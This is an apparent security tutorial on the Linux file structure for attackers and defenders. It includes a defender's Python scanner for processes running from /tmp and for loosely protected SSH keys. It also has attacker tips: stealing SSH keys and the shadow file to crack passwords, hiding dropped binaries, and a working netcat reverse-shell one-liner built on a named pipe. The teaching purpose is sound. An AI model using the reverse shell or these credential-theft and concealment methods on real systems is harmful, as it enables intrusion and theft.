This lesson will not re-invent the wheel by teaching another Linux file structure lesson. There are many other articles that already discuss that topic in detail. What this lesson hopes to accomplish is to give the reader an understanding of why it is important to learn the Linux file structure from both offensive and defensive perspectives.
- The Linux Documentation Project & How Linux Works, 2nd Edition: What Every Superuser Should Know do a spectacular job of describing files, partitions, mount points and file system layout.
One thing to note in all of this is that Linux distributions such as Red Hat and Debian differ slightly in file structure. Overall, the most important things to understand are the basic file structure and that everything is a file or a process. This means that you can create a special file called a “Named Pipe” or “First In, First Out (FIFO)”, and it works exactly as it sounds: if you send data in at one end with a redirection operator, you can read that data out at the other end.
As a defender, you should understand your operating environment. A key part of being effective is knowing how to separate normal from abnormal. For example, binary files in your /proc directory, or processes making network connections from a binary in /boot, may be worth looking into.
Additionally, there are several files that a defender should guard closely and an attacker will go after. Knowing what these files are, where to find them, and when they have weak permissions is important.
Some but not all of these files are:
- SSH keys located in ~/.ssh – weak permissions on these will allow you to grab the keys and connect without a password (if the user has not password-protected their SSH keys)
- /etc/passwd and /etc/shadow – often considered the crown jewels; grabbing these will let you crack passwords with John the Ripper relatively quickly
- /proc – reading the contents of this file structure is key to understanding your target. For example, /proc/version reveals the kernel version and the Linux distro it was built for
- /etc – this holds a lot of configuration data; many programs store hashes for accounts and passwords here
As a defender, you receive a call that one of your systems has been acting erratically. You see that CPU usage spikes in the off hours, the hard drive seems fuller than normal, and you have a process running a binary from the /tmp directory.
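The two defender checks described above (a process executing a binary from /tmp or another odd directory, and secret files such as SSH private keys with weak permissions), as an added Python example that is not part of the original lesson; the list of odd execution directories and the 0600 key-mode threshold are assumptions chosen for this example:

```python
import os
import stat

# Assumption for this example: directories from which no installed program should be
# executing (the lesson's /tmp, /boot and /proc, plus the other common scratch dirs).
ODD_EXEC_DIRS = ("/tmp", "/var/tmp", "/dev/shm", "/boot", "/proc")

# Widest acceptable mode for a private key: owner read/write only (what sshd itself demands).
KEY_MAX_MODE = 0o600


def is_odd_exec_path(exe_path):
    """True when a process image lives under a directory where binaries do not belong."""
    return any(exe_path == d or exe_path.startswith(d + "/") for d in ODD_EXEC_DIRS)


def key_is_too_open(mode_bits):
    """True when the permission bits grant any access to group or others."""
    return bool(stat.S_IMODE(mode_bits) & ~KEY_MAX_MODE)


def scan_running_processes(proc_root="/proc"):
    """Return (pid, exe) pairs for processes whose image comes from an odd directory.

    /proc/<pid>/exe is the kernel's view of the running image, so a binary that was
    deleted after launch still shows its origin (suffixed with ' (deleted)')."""
    findings = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        try:
            exe = os.readlink(os.path.join(proc_root, entry, "exe"))
        except OSError:
            continue  # kernel threads, or processes we lack permission to inspect
        if is_odd_exec_path(exe):
            findings.append((int(entry), exe))
    return findings


def scan_ssh_keys(ssh_dir=os.path.expanduser("~/.ssh")):
    """Return private-key files in ssh_dir whose mode is wider than KEY_MAX_MODE."""
    if not os.path.isdir(ssh_dir):
        return []
    return [os.path.join(ssh_dir, n) for n in os.listdir(ssh_dir)
            if not n.endswith(".pub") and os.path.isfile(os.path.join(ssh_dir, n))
            and key_is_too_open(os.stat(os.path.join(ssh_dir, n)).st_mode)]


if __name__ == "__main__":
    for pid, exe in scan_running_processes():
        print(f"pid {pid} is executing {exe}")
    for path in scan_ssh_keys():
        print(f"{path} is readable or writable by group/others")
```

Run it as the user whose keys you want audited; the process scan needs root to read every /proc/<pid>/exe link, and unreadable entries are skipped rather than reported.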
Now that you know what a defender looks for, as an attacker or pentester you know how to hide: avoid placing files in odd locations. If you’re dropping binaries, it’s best to mimic the layout of the target operating system. Being effective at camouflage is an underrated ability.
Additionally, understanding file structure is important because good attackers use the tools that are already at their disposal. Knowing where tools are, and not having to write to the file system, means that you leave less of a footprint on the box. If you list the contents of the /bin directory you can see many of the default tools installed on a Linux distro.
On the topic of file systems, here is a nifty way to send a reverse shell through netcat if the target system’s netcat does not have the -e option enabled (HOST and PORT are placeholders for the listener’s address and port):
mknod backpipe p; nc HOST PORT 0<backpipe | /bin/bash 1>backpipe
To break it down: mknod creates backpipe as a named pipe (FIFO); nc reads its stdin (0) from backpipe and what it receives from the network is piped into /bin/bash; bash’s stdout (1) is written back into backpipe, so each command’s output becomes nc’s input and is sent back over the connection.
To visualize the flow:
network > nc > /bin/bash > backpipe > nc > network
File structures in Linux are pretty straightforward. Knowing what to protect, what to attack, and how to find exactly what you’re looking for are key concepts for both attackers and defenders.